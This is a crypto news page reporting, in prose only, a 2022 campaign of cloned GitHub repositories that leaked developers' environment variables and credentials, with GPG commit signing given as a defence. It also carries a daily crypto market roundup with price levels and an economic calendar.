GitHub faces widespread malware attacks affecting projects, including crypto

GitHub faces widespread malware attacks affecting projects, including crypto
Crypto Security
Like? Do Rank It! Likes

Major developer platform GitHub faced a widespread malware attack and reported 35,000 “code hits” on a day that saw thousands of Solana-based wallets drained for millions of dollars.

The widespread attack was highlighted by GitHub developer Stephen Lucy who first reported the incident earlier on Aug. 3. The developer came across the issue while reviewing a project he found on a Google search.

So far, various projects from crypto, Golang, Python, js, Bash, Docker and Kubernetes were found to be affected by the attack. The malware attack is targeted at the docker images, install docs and npm script, which is a convenient way to bundle common shell commands for a project.

To dupe developers and access critical data, the attacker first creates a fake repository (a repository contains all of the project's files and each file's revision history) and pushes clones of legit projects to GitHub. For example, the following two snapshots show this legit crypto miner project and its clone.

Original Crypto Mining Project Source: Github
Cloned Crypto Mining Project Source: Github

Many of these clone repositories were pushed as “pull requests.” Pull requests let developers tell others about changes they have pushed to a branch in a repository on GitHub.

Related: Nomad reportedly ignored security vulnerability that led to $190M exploit

Once the developer falls prey to the malware attack, the entire environment variable (ENV) of the script, application, or laptop (electron apps), is sent to the attacker's server. ENV includes security keys, AWS access keys, crypto keys and much more.

The developer has reported the issue to GitHub and advised developers to GPG sign their revisions made to the repository. GPG keys add an extra layer of security to your GitHub accounts and software projects by providing a way of verifying all revisions come from a trusted source

Crypto Daily - Crypto And Financial News 11/08/2022 Ripple Buying Celsius?
japan eu eth/usd
4 hours ago

In Todays Headline TV CryptoDaily News: BitPay partners Cardlytics for cash back rewards. BitPay, the world’s largest provider of Bitcoin and cryptocurrency payment services, added a reward program to its BitPay Prepaid Card. Cardlytics, a cash-back rewards platform, is managing the rewards where the BitPay cardholder automatically receives cash back on purchases. Hackers have stolen $1.4 billion this year using crypto bridges. Crypto bridges, which link blockchain networks together, have become major targets for cybercriminals. A total of around $1.4 billion has been lost to breaches on cross-chain bridges this year, according to figures from blockchain analytics firm Chainalysis. Ripple Labs 'interested' in bankrupt crypto lender Celsius' assets. San Francisco-based blockchain payments company Ripple Labs Inc is interested in potentially purchasing assets of bankrupt crypto lender Celsius Network, according to a company spokesperson. BTC/USD exploded 2.9% in the last session. The Bitcoin-Dollar pair exploded 2.9% in the last session. The Stochastic indicator is giving a negative signal. Support is at 22289.6667 and resistance at 24337.6667. The Stochastic indicator is giving a negative signal. ETH/USD skyrocketed 7.5% in the last session. The Ethereum-Dollar pair skyrocketed 7.5% in the last session. According to the CCI, we are in an overbought market. Support is at 1599.2733 and resistance at 1841.3733. The CCI points to an overbought market. XRP/USD skyrocketed 2.6% in the last session. The Ripple-Dollar pair skyrocketed 2.6% in the last session. The MACD is giving a negative signal. Support is at 0.3499 and resistance at 0.3887. The MACD is currently in negative territory. LTC/USD skyrocketed 4.3% in the last session. The Litecoin-Dollar pair gained 4.3% in the last session after rising as much as 5.2% during the session. The Stochastic-RSI is giving a negative signal. Support is at 55.5833 and resistance at 64.6433. The Stochastic-RSI is currently in negative territory. Daily Economic Calendar: IE Consumer Price Index The Consumer Price Index is a measure of price movements made by comparing the retail prices of a representative shopping basket of goods and services. The Irish Consumer Price Index will be released at 10:00 GMT, Japan's Foreign Investment in Japan Stocks at 23:50 GMT, the US Continuing Jobless Claims at 12:30 GMT. JP Foreign Investment in Japanese Stocks Securities investment referrers to bonds issued in a domestic market by a foreign entity in the domestic market’s currency. US Continuing Jobless Claims The Counting Jobless Claims measure the number of individuals who are unemployed and are currently receiving unemployment benefits. JP Foreign Bond Investment The Foreign Bond Investment refers to bonds issued in a domestic market by a foreign entity in the domestic market’s currency. Japan's Foreign Bond Investment will be released at 23:50 GMT, the US Initial Jobless Claims at 12:30 GMT, the Irish HICP at 10:00 GMT. US Initial Jobless Claims The Initial Jobless Claims is a measure of the number of people filing first-time claims for state unemployment insurance. IE HICP The HICP is a measure of price movements or inflation harmonized across EU Member States. It is similar to the national Consumer Price Indices (CPI). Disclaimer: This article is provided for informational purposes only. It is not offered or intended to be used as legal, tax, investment, financial, or other advice.

BlackRock announces the launch of a new private spot Bitcoin trust
18 hours ago

The move comes one week after its partnership with Coinbase to provide institutional clients with crypto trading access.